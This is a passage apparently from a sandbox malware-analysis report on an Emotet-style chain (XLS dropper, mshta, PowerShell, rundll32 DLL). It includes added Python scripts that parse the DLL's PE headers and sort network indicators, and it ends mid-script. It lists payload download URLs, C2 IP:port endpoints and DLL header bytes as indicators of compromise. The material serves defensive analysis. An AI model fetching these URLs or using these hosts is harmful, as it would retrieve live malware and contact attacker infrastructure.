2e 74 65 78 74 00 00 00 39 45 04 00 00 10 00 00 00 50 04 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 92 cd 00 00 00 60 04 00 00 d0 00 00 00 60 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 80 65 00 00 00 30 05 00 00 30 00 00 00 30 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 50 76 02 00 00 a0 05 00 00 80 02 00 00 60 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 76 93 00 00 00 20 08 00 00 a0 00 00 00 e0 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
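The Data Raw field of the HTTP 200 response above carries the first bytes of XrEtCt.dll, enough to read the whole PE header and section table by hand. The following script is an added example, not part of the Joe Sandbox report: it reassembles the header region from the hex shown in the response (DOS header, the PE/COFF/optional headers at e_lfanew = 0xF0, and the five section headers), decodes the fields an analyst checks first, and compares the end of the last section with the response's Content-Length of 557056. The DOS stub and Rich header between offsets 0x40 and 0xEF are zero-filled rather than copied because the parser never reads them; the parser handles only PE32 images, which is what this DLL is (consistent with its later execution through C:\Windows\SysWOW64\rundll32.exe in this report).

```python
"""Decode the PE headers visible in the 'Data Raw' bytes of the HTTP 200 response that
delivered XrEtCt.dll, and check the section table against the Content-Length header."""
import struct
from datetime import datetime, timezone

# Hex copied from the report's Data Raw field. DOS header, offsets 0x00-0x3F:
DOS_HEADER_HEX = """
4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 00 00
"""
# From e_lfanew = 0xF0: PE signature, COFF header, PE32 optional header with 16 data directories:
PE_HEADERS_HEX = """
50 45 00 00 4c 01 05 00 91 fa f3 61 00 00 00 00 00 00 00 00 e0 00 02 21
0b 01 08 00 00 50 04 00 00 20 04 00 00 00 00 00 06 0d 03 00 00 10 00 00 00 60 04 00 00 00 00 10
00 10 00 00 00 10 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 c0 08 00 00 10 00 00
5d f5 08 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00
40 2d 05 00 52 00 00 00 34 10 05 00 04 01 00 00 00 a0 05 00 50 76 02 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 20 08 00 30 4e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 90 bd 04 00 40 00 00 00 00 00 00 00 00 00 00 00
00 60 04 00 94 05 00 00 ac 0f 05 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
"""
# The five 40-byte section headers that follow the optional header:
SECTION_TABLE_HEX = """
2e 74 65 78 74 00 00 00 39 45 04 00 00 10 00 00 00 50 04 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60
2e 72 64 61 74 61 00 00 92 cd 00 00 00 60 04 00 00 d0 00 00 00 60 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40
2e 64 61 74 61 00 00 00 80 65 00 00 00 30 05 00 00 30 00 00 00 30 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0
2e 72 73 72 63 00 00 00 50 76 02 00 00 a0 05 00 00 80 02 00 00 60 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40
2e 72 65 6c 6f 63 00 00 76 93 00 00 00 20 08 00 00 a0 00 00 00 e0 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42
"""
CONTENT_LENGTH = 557056  # Content-Length header of the same response

IMAGE_FILE_DLL = 0x2000
IMAGE_SCN_MEM_EXECUTE = 0x20000000
MACHINE_NAMES = {0x14C: "i386", 0x8664: "x86-64"}


def build_sample():
    """Reassemble the header region. Offsets 0x40-0xEF hold the DOS stub and Rich header,
    which the parser never reads, so they are zero-filled instead of copied."""
    dos = bytes.fromhex(DOS_HEADER_HEX)
    return (dos + b"\x00" * (0xF0 - len(dos))
            + bytes.fromhex(PE_HEADERS_HEX) + bytes.fromhex(SECTION_TABLE_HEX))


def parse_pe(buf):
    """Return the header fields an analyst looks at first. PE32 only; raises on bad input."""
    if buf[:2] != b"MZ":
        raise ValueError("missing MZ signature")
    e_lfanew, = struct.unpack_from("<I", buf, 0x3C)
    if buf[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("PE signature not at e_lfanew")
    machine, nsections, timestamp, _, _, opt_size, characteristics = struct.unpack_from(
        "<HHIIIHH", buf, e_lfanew + 4)
    opt = e_lfanew + 24
    magic, = struct.unpack_from("<H", buf, opt)
    if magic != 0x10B:
        raise ValueError("not a PE32 optional header")
    entry, = struct.unpack_from("<I", buf, opt + 16)
    image_base, = struct.unpack_from("<I", buf, opt + 28)
    size_of_image, = struct.unpack_from("<I", buf, opt + 56)
    subsystem, = struct.unpack_from("<H", buf, opt + 68)
    sections = []
    for i in range(nsections):
        off = opt + opt_size + i * 40
        name, vsize, va, raw_size, raw_ptr = struct.unpack_from("<8sIIII", buf, off)
        flags, = struct.unpack_from("<I", buf, off + 36)
        sections.append({"name": name.rstrip(b"\0").decode("ascii"), "va": va, "vsize": vsize,
                         "raw_size": raw_size, "raw_ptr": raw_ptr,
                         "executable": bool(flags & IMAGE_SCN_MEM_EXECUTE)})
    entry_section = next((s["name"] for s in sections
                          if s["va"] <= entry < s["va"] + max(s["vsize"], s["raw_size"])), None)
    return {
        "machine": MACHINE_NAMES.get(machine, hex(machine)),
        "is_dll": bool(characteristics & IMAGE_FILE_DLL),
        "compiled_utc": datetime.fromtimestamp(timestamp, timezone.utc).isoformat(),
        "entry_point": entry,
        "entry_section": entry_section,
        "image_base": image_base,
        "size_of_image": size_of_image,
        "subsystem": subsystem,  # 2 = Windows GUI, 3 = console
        "sections": sections,
        # End of the last section's raw data: the file size if nothing is appended.
        "file_size_from_sections": max(s["raw_ptr"] + s["raw_size"] for s in sections),
    }


def overlay_bytes(info, content_length):
    """Bytes the server sent beyond the section table (appended config or payloads)."""
    return content_length - info["file_size_from_sections"]


if __name__ == "__main__":
    info = parse_pe(build_sample())
    for key, value in info.items():
        if key != "sections":
            print(f"{key:24} {value}")
    for s in info["sections"]:
        print(f"  {s['name']:7} va=0x{s['va']:06x} raw=0x{s['raw_ptr']:06x}+0x{s['raw_size']:05x}"
              f" exec={s['executable']}")
    print("overlay bytes:", overlay_bytes(info, CONTENT_LENGTH))
```

Two results are worth noting. The COFF timestamp 0x61f3fa91 decodes to 2022-01-28 14:15:45 UTC, about six hours before the Date header on the response (Fri, 28 Jan 2022 20:15:08 GMT), so the DLL was built the same day it was served. The last section (.reloc) ends at raw offset 0x7e000 + 0xa000 = 0x88000 = 557056, exactly the Content-Length, so the response carried the DLL with no overlay; a non-zero result from overlay_bytes would be the first place to look for an appended configuration blob.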
                            Source: global trafficHTTP traffic detected: GET /ee/ss/se.html HTTP/1.1Accept: */*Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 91.240.118.172Connection: Keep-Alive
                            Source: Joe Sandbox ViewASN Name: AS-CHOOPAUS AS-CHOOPAUS
                            Source: Joe Sandbox ViewASN Name: DIGITALOCEAN-ASNUS DIGITALOCEAN-ASNUS
                            Source: Joe Sandbox ViewIP Address: 207.148.81.119 207.148.81.119
                            Source: Joe Sandbox ViewIP Address: 104.131.62.48 104.131.62.48
                            Source: global trafficTCP traffic: 192.168.2.22:49169 -> 74.207.230.120:8080
                            Source: global trafficTCP traffic: 192.168.2.22:49170 -> 139.196.72.155:8080
                            Source: unknownNetwork traffic detected: IP country count 15
                            Source: powershell.exe, 00000008.00000002.669044453.0000000003953000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://3-fasen.c
                            Source: powershell.exe, 00000008.00000002.669044453.0000000003953000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://3-fasen.com/wp-content/3B
                            Source: powershell.exe, 00000008.00000002.669044453.0000000003953000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://3-fasen.com/wp-content/3Bl0hBbW/
                            Source: powershell.exe, 00000008.00000002.669044453.0000000003953000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://3-fasen.com/wp-content/3Bl0hBbW/PE3
                            Source: powershell.exe, 00000008.00000002.668843718.00000000037FF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://91.240.11
                            Source: powershell.exe, 00000008.00000002.668843718.00000000037FF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.669044453.0000000003953000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://91.240.118.172
                            Source: DOCUMENT_2801.xls.0.drString found in binary or memory: http://91.240.118.172/ee/ss/se.html
                            Source: mshta.exe, 00000006.00000003.415186421.000000000314D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://91.240.118.172/ee/ss/se.htmlfunction
                            Source: mshta.exe, 00000006.00000003.414502711.0000000003145000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://91.240.118.172/ee/ss/se.htmlhttp://91.240.118.172/ee/ss/se.html
                            Source: mshta.exe, 00000006.00000003.428424323.00000000040DC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000003.427844761.00000000040DC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000003.412617394.00000000040DC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000002.433058972.00000000040DC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://91.240.118.172/ee/ss/se.htmli
                            Source: mshta.exe, 00000006.00000002.429411187.000000000048E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://91.240.118.172/ee/ss/se.htmlngs
                            Source: powershell.exe, 00000008.00000002.668843718.00000000037FF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://91.240.118.172/ee/ss/se.p
                            Source: powershell.exe, 00000008.00000002.668843718.00000000037FF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.670073907.000000001B6A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://91.240.118.172/ee/ss/se.png
                            Source: powershell.exe, 00000008.00000002.668843718.00000000037FF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://91.240.118.172/ee/ss/se.pngPE3
                            Source: mshta.exe, 00000006.00000003.412876273.000000000053F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000002.430034442.000000000053F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000003.428162711.000000000053F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://91.240.118.17f
                            Source: rundll32.exe, 0000000E.00000002.559655343.000000000032A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://91.240.11x
                            Source: rundll32.exe, 00000011.00000002.663586016.00000000004E9000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000011.00000002.663543768.00000000004D7000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000011.00000002.663566714.00000000004E4000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000011.00000002.663437430.00000000004A4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
                            Source: rundll32.exe, 00000011.00000002.663586016.00000000004E9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.entrust.net/2048ca.crl0
                            Source: rundll32.exe, 00000011.00000002.663586016.00000000004E9000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000011.00000002.663437430.00000000004A4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.entrust.net/server1.crl0
                            Source: rundll32.exe, 00000011.00000002.663586016.00000000004E9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
                            Source: rundll32.exe, 00000011.00000002.663566714.00000000004E4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
                            Source: rundll32.exe, 00000011.00000002.663586016.00000000004E9000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000011.00000002.663437430.00000000004A4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
                            Source: rundll32.exe, 00000011.00000002.663543768.00000000004D7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en
                            Source: rundll32.exe, 00000011.00000002.663586016.00000000004E9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
                            Source: powershell.exe, 00000008.00000002.669044453.0000000003953000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://devbhoomigaushala.org/Get
                            Source: powershell.exe, 00000008.00000002.669044453.0000000003953000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://devbhoomigaushala.org/Getae/Vyo5rrNLAgd0QxXvkv/
                            Source: powershell.exe, 00000008.00000002.669044453.0000000003953000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://devbhoomigaushala.org/Getae/Vyo5rrNLAgd0QxXvkv/PE3
                            Source: powershell.exe, 00000008.00000002.669044453.0000000003953000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://engaz.sho
                            Source: powershell.exe, 00000008.00000002.669044453.0000000003953000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://engaz.shop/wp-content/MOl
                            Source: powershell.exe, 00000008.00000002.669044453.0000000003953000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://engaz.shop/wp-content/MOllqUm2nb/
                            Source: powershell.exe, 00000008.00000002.669044453.0000000003953000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://engaz.shop/wp-content/MOllqUm2nb/PE3
                            Source: powershell.exe, 00000008.00000002.669044453.0000000003953000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://imaginariumstore.fun/ncsb
                            Source: powershell.exe, 00000008.00000002.669044453.0000000003953000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://imaginariumstore.fun/ncsb/cyGoTYqMmcRwvqdre/
                            Source: powershell.exe, 00000008.00000002.669044453.0000000003953000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://imaginariumstore.fun/ncsb/cyGoTYqMmcRwvqdre/PE3
                            Source: powershell.exe, 00000008.00000002.669044453.0000000003953000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://manchesterheatingservices.youprocontact.com/wp-admin/AiK1
                            Source: powershell.exe, 00000008.00000002.669044453.0000000003953000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://manchesterheatingservices.youprocontact.com/wp-admin/AiK19uMf/
                            Source: powershell.exe, 00000008.00000002.669044453.0000000003953000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://manchesterheatingservices.youprocontact.com/wp-admin/AiK19uMf/PE3
                            Source: rundll32.exe, 00000011.00000002.663586016.00000000004E9000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000011.00000002.663566714.00000000004E4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0
                            Source: rundll32.exe, 00000011.00000002.663543768.00000000004D7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0%
                            Source: rundll32.exe, 00000011.00000002.663586016.00000000004E9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0-
                            Source: rundll32.exe, 00000011.00000002.663586016.00000000004E9000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000011.00000002.663437430.00000000004A4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0/
                            Source: rundll32.exe, 00000011.00000002.663543768.00000000004D7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com05
                            Source: rundll32.exe, 00000011.00000002.663586016.00000000004E9000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000011.00000002.663437430.00000000004A4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.entrust.net03
                            Source: rundll32.exe, 00000011.00000002.663586016.00000000004E9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.entrust.net0D
                            Source: powershell.exe, 00000008.00000002.669044453.0000000003953000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://onexone.e
                            Source: powershell.exe, 00000008.00000002.669044453.0000000003953000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://onexone.elementor.cloud/c
                            Source: powershell.exe, 00000008.00000002.669044453.0000000003953000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://onexone.elementor.cloud/cdrxhrt/uVE0uVHOz5E/
                            Source: powershell.exe, 00000008.00000002.669044453.0000000003953000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://onexone.elementor.cloud/cdrxhrt/uVE0uVHOz5E/PE3
                            Source: rundll32.exe, 00000011.00000002.665515752.00000000038C0000.00000002.00000001.00040000.00000000.sdmpString found in binary or memory: http://servername/isapibackend.dll
                            Source: powershell.exe, 00000008.00000002.669044453.0000000003953000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tamiladsense.com
                            Source: powershell.exe, 00000008.00000002.669044453.0000000003953000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tamiladsense.com/wp-inclu
                            Source: powershell.exe, 00000008.00000002.669044453.0000000003953000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tamiladsense.com/wp-includes/BEADvqGgemV8SnTX/
                            Source: powershell.exe, 00000008.00000002.669044453.0000000003953000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tamiladsense.com/wp-includes/BEADvqGgemV8SnTX/PE3
                            Source: powershell.exe, 00000008.00000002.669044453.0000000003953000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tunbridgeservices.com/jfo
                            Source: powershell.exe, 00000008.00000002.669044453.0000000003953000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tunbridgeservices.com/jfoeqhxz/zOX0/
                            Source: powershell.exe, 00000008.00000002.669044453.0000000003953000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tunbridgeservices.com/jfoeqhxz/zOX0/PE3
                            Source: rundll32.exe, 00000011.00000002.663586016.00000000004E9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.digicert.com.my/cps.htm02
                            Source: rundll32.exe, 00000011.00000002.663586016.00000000004E9000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000011.00000002.663566714.00000000004E4000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000011.00000002.663437430.00000000004A4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
                            Source: powershell.exe, 00000008.00000002.663093888.0000000000277000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.piriform.com/ccleaner
                            Source: mshta.exe, 00000006.00000003.428385382.000000000405D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000003.428149840.0000000000530000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.protware.com
                            Source: rundll32.exe, 00000011.00000002.663342975.000000000047A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://139.196.72.155/
                            Source: rundll32.exe, 00000011.00000002.663437430.00000000004A4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://139.196.72.155/R
                            Source: rundll32.exe, 00000011.00000002.663437430.00000000004A4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://139.196.72.155:8080/LAeYVpeCtdnRcZsIKojYxnmOXJiyfTZboPIEXmAZEe
                            Source: rundll32.exe, 00000011.00000002.663437430.00000000004A4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://139.196.72.155:8080/LAeYVpeCtdnRcZsIKojYxnmOXJiyfTZboPIEXmAZEezOwG
                            Source: rundll32.exe, 00000011.00000002.663437430.00000000004A4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://74.207.230.120/O
                            Source: rundll32.exe, 00000011.00000002.663437430.00000000004A4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://74.207.230.120/d
                            Source: rundll32.exe, 00000011.00000002.663437430.00000000004A4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://74.207.230.120:8080/FdEJzcDerSgtVabAaMUkOcPkEPidYPfBmMvmzXVDJBNdJaXM
                            Source: rundll32.exe, 00000011.00000002.663437430.00000000004A4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://74.207.230.120:8080/FdEJzcDerSgtVabAaMUkOcPkEPidYPfBmMvmzXVDJBNdJaXMcsv%lwG
                            Source: powershell.exe, 00000008.00000002.669044453.0000000003953000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ecobaby.pi-dh.com/Serend
                            Source: powershell.exe, 00000008.00000002.669044453.0000000003953000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ecobaby.pi-dh.com/Serendib/gl1hcef9Y3GSTCDC/
                            Source: powershell.exe, 00000008.00000002.669044453.0000000003953000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ecobaby.pi-dh.com/Serendib/gl1hcef9Y3GSTCDC/PE3
                            Source: powershell.exe, 00000008.00000002.669044453.0000000003953000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://lastregaristorante.com/w
                            Source: powershell.exe, 00000008.00000002.669044453.0000000003953000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://lastregaristorante.com/wp-admin/ffdC7ElM2Bn2/
                            Source: powershell.exe, 00000008.00000002.669044453.0000000003953000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://lastregaristorante.com/wp-admin/ffdC7ElM2Bn2/PE3
                            Source: powershell.exe, 00000008.00000002.669044453.0000000003953000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://mypurealsystem.com/App_S
                            Source: powershell.exe, 00000008.00000002.669044453.0000000003953000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://mypurealsystem.com/App_Start/Rhh8lKO/
                            Source: powershell.exe, 00000008.00000002.669044453.0000000003953000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://mypurealsystem.com/App_Start/Rhh8lKO/PE3
                            Source: powershell.exe, 00000008.00000002.669044453.0000000003953000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oculusvisioncare.com/wp-
                            Source: powershell.exe, 00000008.00000002.669044453.0000000003953000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oculusvisioncare.com/wp-includes/ZEYDjosbNExFTdu/
                            Source: powershell.exe, 00000008.00000002.669044453.0000000003953000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oculusvisioncare.com/wp-includes/ZEYDjosbNExFTdu/PE3
                            Source: rundll32.exe, 00000011.00000002.663586016.00000000004E9000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000011.00000002.663543768.00000000004D7000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000011.00000002.663566714.00000000004E4000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000011.00000002.663437430.00000000004A4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://secure.comodo.com/CPS0
                            Source: powershell.exe, 00000008.00000002.669044453.0000000003953000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://vn.minin
                            Source: powershell.exe, 00000008.00000002.669044453.0000000003953000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://vn.minino.com/wp-admin/c
                            Source: powershell.exe, 00000008.00000002.669044453.0000000003953000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://vn.minino.com/wp-admin/c3WQa/
                            Source: powershell.exe, 00000008.00000002.669044453.0000000003953000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://vn.minino.com/wp-admin/c3WQa/PE3
                            Source: C:\Windows\System32\mshta.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\se[1].htmJump to behavior
                            Source: unknownDNS traffic detected: queries for: tamiladsense.com
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_10012C30 _memset,connect,_strcat,send,recv,
                            Source: unknownTCP traffic detected without corresponding DNS query: 91.240.118.172 (19 connections)
                            Source: unknownTCP traffic detected without corresponding DNS query: 74.207.230.120 (3 connections)
                            Source: unknownTCP traffic detected without corresponding DNS query: 139.196.72.155 (10 connections)
                            Source: mshta.exe, 00000006.00000003.428066381.00000000004BC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000002.429429555.00000000004BC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000003.412759270.00000000004BC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: /moc.nideknil.wwwwww.linkedin.com equals www.linkedin.com (Linkedin)
                            Source: mshta.exe, 00000006.00000003.428066381.00000000004BC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000002.429429555.00000000004BC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000003.412759270.00000000004BC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: www.linkedin.com equals www.linkedin.com (Linkedin)
                            Source: rundll32.exe, 00000011.00000002.663586016.00000000004E9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_1001B43F GetKeyState,GetKeyState,GetKeyState,GetKeyState,SendMessageA,
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_1001B43F GetKeyState,GetKeyState,GetKeyState,GetKeyState,SendMessageA,
                            Source: C:\Windows\System32\mshta.exeWindow created: window name: CLIPBRDWNDCLASS
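The network section above mixes three kinds of indicators: C2 endpoints pulled from the Emotet configuration (the "Malware configuration extractor" lines), stage-1 download URLs recovered from PowerShell memory (the "String found in binary or memory" lines, each reported several times, truncated at different lengths and with "PE3" glued on), and strings that are plain Windows noise (the CRL, OCSP and ctldl.windowsupdate.com URLs from rundll32.exe, or the servername placeholder). The script below is an added example, not part of the Joe Sandbox report, that sorts such lines into buckets. It runs over a constructed list of lines copied in the shape of the report's own entries. The noise host patterns, the treatment of a trailing "PE3" as scanner junk rather than part of the URL, and the rule that a string which is a strict prefix of a longer one is a truncated duplicate are all assumptions made for the example; extend the noise list from baseline dumps of clean processes before relying on it.

```python
"""Sort a Joe Sandbox report's network lines into IOC buckets and discard the
certificate/OS strings that appear in nearly every Windows process dump."""
import re
from ipaddress import ip_address
from urllib.parse import urlsplit

# Constructed input: lines in the exact shape the report uses (not the full list).
SAMPLE_LINES = """\
Source: Malware configuration extractorIPs: 191.252.103.16:80
Source: Malware configuration extractorIPs: 210.57.209.142:8080
Source: Malware configuration extractorIPs: 185.168.130.138:443
Source: global trafficTCP traffic: 192.168.2.22:49169 -> 74.207.230.120:8080
Source: powershell.exe, 00000008.00000002.669044453.0000000003953000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://3-fasen.c
Source: powershell.exe, 00000008.00000002.669044453.0000000003953000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://3-fasen.com/wp-content/3Bl0hBbW/
Source: powershell.exe, 00000008.00000002.669044453.0000000003953000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://3-fasen.com/wp-content/3Bl0hBbW/PE3
Source: rundll32.exe, 00000011.00000002.663586016.00000000004E9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
Source: rundll32.exe, 00000011.00000002.663586016.00000000004E9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0
Source: rundll32.exe, 00000011.00000002.663586016.00000000004E9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
Source: rundll32.exe, 00000011.00000002.665515752.00000000038C0000.00000002.00000001.00040000.00000000.sdmpString found in binary or memory: http://servername/isapibackend.dll
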